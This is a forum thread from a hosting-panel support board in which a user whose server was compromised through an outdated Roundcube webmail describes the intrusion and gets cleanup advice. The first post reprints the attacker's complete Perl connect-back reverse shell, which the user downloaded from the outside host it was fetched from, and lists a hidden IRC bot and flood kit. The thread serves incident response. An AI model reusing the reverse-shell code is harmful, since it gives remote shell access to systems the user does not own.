Server Hacked ispconfig leak?

Discussion in 'General' started by clandistwood, Apr 1, 2009.

  1. clandistwood

    clandistwood New Member

    Hi,

    My server was blocked by my provider, here's the log of their detection program :
    Code:
    --------------------------- LOGS DE SCAN ---------------------------
    
    DDOS attacks with 46bytes pkts
    
    startime endtime scr:port dst:port
    ----------------------------------------------------------------------------------------------
    2009-03-31 14:51:25 2009-03-31 14:51:26 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:26 2009-03-31 14:51:28 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:28 2009-03-31 14:51:45 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:45 2009-03-31 14:51:50 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:50 2009-03-31 14:51:53 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:53 2009-03-31 14:52:18 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:52:38 2009-03-31 14:53:12 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:12 2009-03-31 14:53:18 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:18 2009-03-31 14:53:21 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:21 2009-03-31 14:53:23 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:23 2009-03-31 14:53:26 x.x.x.x:47700 88.84.141.189:0
    
    Here, x.x.x.x is my ip address.

    in the rescue mode (ssh only with no other services running), i was able to connect to the server and here's what i found in the /root/ispconfig/httpd/logs/error_log :

    Code:
    --14:45:44--  http://alecsandru.ilive.ro/nc.jpg
               => `nc.jpg'
    Resolving alecsandru.ilive.ro... 86.55.1.30
    Connecting to alecsandru.ilive.ro|86.55.1.30|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 872 [image/jpeg]
    
        0K                                                       100%  125.66 MB/s
    
    14:45:44 (125.66 MB/s) - `nc.jpg' saved [872/872]
    
    
    when I search for the nc.jpg it was not found anywhere in my server, probably was deleted by the hacker.

    but when i download it from http://alecsandru.ilive.ro/, here what it's look like

    Code:
    #!/usr/bin/perl
    use Socket;
    print "\n[~] Incerc sa fac legatura =)\n";
    $host = $ARGV[0];
    $port = 8080;
    if ($ARGV[1]) {
      $port = $ARGV[1];
    }
    $proto = getprotobyname('tcp') || die("[-] Nu merge treaba\n\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Eroare socket\n\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
      die("[-] Conecktback Esuat\n\n");
    }
    if (!fork( )) {
      open(STDIN,">&SERVER");
      open(STDOUT,">&SERVER");
      open(STDERR,">&SERVER");
      print "[+] Conectback by sTrEs ... private version 
    =)\n"; 
      system("unset HISTFILE; unset HISTSAVE ; uname -a ; id ; w ; echo \"[+] Time to burn...\";echo \"[+] Do not fucking press Ctrl C\"; /bin/sh -i");
      exit(0);
    }
    print "[+] Conectback Reusit !\n\n";
    
    
    Backdoor for sure :(

    chkrootkit found nothing, but while searching i found a strange folder ".." in /var/tmp, it was hidded but its name so i can't notice it, but I Do :rolleyes:

    in this folder i found ".shell" folder and in it :
    Code:
    drwx------ 5 admispconfig admispconfig   4096 Apr  1 15:45 .
    drwxr-xr-x 3 admispconfig admispconfig   4096 Apr  1 16:31 ..
    -rw-r--r-- 1 admispconfig admispconfig     59 Mar 31 14:50 JohnDoe.seen
    -rwxr-xr-x 1 admispconfig admispconfig    118 Mar 31 14:46 LinkEvents
    drwxr-xr-x 3 admispconfig admispconfig   4096 Oct 11  2002 flood
    -rwx--x--x 1 admispconfig admispconfig 488645 Jan 13  2003 httpd
    -rwx--x--x 1 admispconfig admispconfig  22935 Oct 10  2000 mech.help
    -rwxr-xr-x 1 admispconfig admispconfig   1084 Mar  8  2002 mech.levels
    -rw------- 1 admispconfig admispconfig      6 Mar 31 14:46 mech.pid
    -rwxr-xr-x 1 admispconfig admispconfig   1406 Mar 13 22:49 mech.set
    drwx--x--x 2 admispconfig admispconfig   4096 Nov  8  2000 randfiles
    drwx--x--x 2 admispconfig admispconfig   4096 Mar  8  2002 src
    -rwxr-xr-x 1 admispconfig admispconfig     69 Mar 13 22:50 x.users
    
    
    the folder has admispconfig privileges as you can see.

    Can you please tell me what to do next?

    just delete the folder? clean ispconfig? maybe upgrade to 3, will this can solve the problem for sure?
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Do you have roundcube installed and if yes, which version?
     
  3. clandistwood

    clandistwood New Member

    Thanx till for the reply.

    Yes i have installed the 0.1-stable version of roundcube months ago
     
  4. till

    till Super Moderator Staff Member ISPConfig Developer

    Then your server was hacked trough roundcube which has a vulnerability in this version and not ispconfig. as roundcube runs under the user admispconfig too, the files are saved uner the admispconfig user.

    1) delete the files in /tmp
    2) install the latest roundcubde.pkg
    3) Update to the latest ispconfig 2.x version (2.2.30).
     
  5. deconectat

    deconectat New Member

  6. clandistwood

    clandistwood New Member

    since the hacker was able to take admispconfig priveleges, it will be safer if i uninstall ispconfig then reinstall version 3, what do you think about that Till?
    or do you think that i'll be good with this (erasing /tmp, upgrading ispconfig and roundcube)
     
  7. clandistwood

    clandistwood New Member

    thanx deconectat,

    i'have just send them an email about that, hope they will act soon.
     
  8. till

    till Super Moderator Staff Member ISPConfig Developer

    The user admispconfig does not has any special priviliges, but of course he meight have inserted something to the ispconfig database e.g. to reconfigure a site.

    ISPconfig 3 is not an update of ispconfig 2, its a different software and there is no way of a direct update.

    The safest way is always to reinstall a aserver that has been hacked. But in your case it might just be that the system has been attacked by some kind of semi automated exploit script and the hacker has not gained any higher priviliges yet. So i would just update ispconfig and roundcube and clean /tmp. then you should have a closer look at the system the next days if anything unusual happens.

    For security reasons you should also change the root password and mysql root password.
     
  9. clandistwood

    clandistwood New Member

    thx

    Thx Till,

    I have cleaned the server, installed latest ispconfig2 (ISPConfig-2.2.31) and upgraded to the latest release of roundcube.

    thx again
     
  10. khayjake

    khayjake Member

    they used netcat..what about roundcube 2a?

    Looks like they used a netcat like method to spawn the shell.

    Glad I upgraded roundcube I didnt know about this vulnerability.

    What about Roundube version 2a?

    I have roundcube 2a installed but have hesitated installing 0.2.1 because i read a post that doesnt transfer over the sqlite user authentication data...?

    I simply cannot recrete every user email account if that's what 0.2.1 requires...however I'd be willing to if roundube 2a is exploitable...

    Anybody know if this vulnerability is in roundube 2a release for ispconfig as well?

    Thanks

    Khayjake
     
  11. till

    till Super Moderator Staff Member ISPConfig Developer

    You might want to ask Hans, the maintainer of the roundcube packages for details. If I remember correctly I#ve read somewere that there was a way to export the data from the sqlite database and then reimport it in the new version.
     
  12. hahni

    hahni New Member

    Hello Till,

    About the same problem I have written you an PM.

    Best regards

    HahniP
     

Share This Page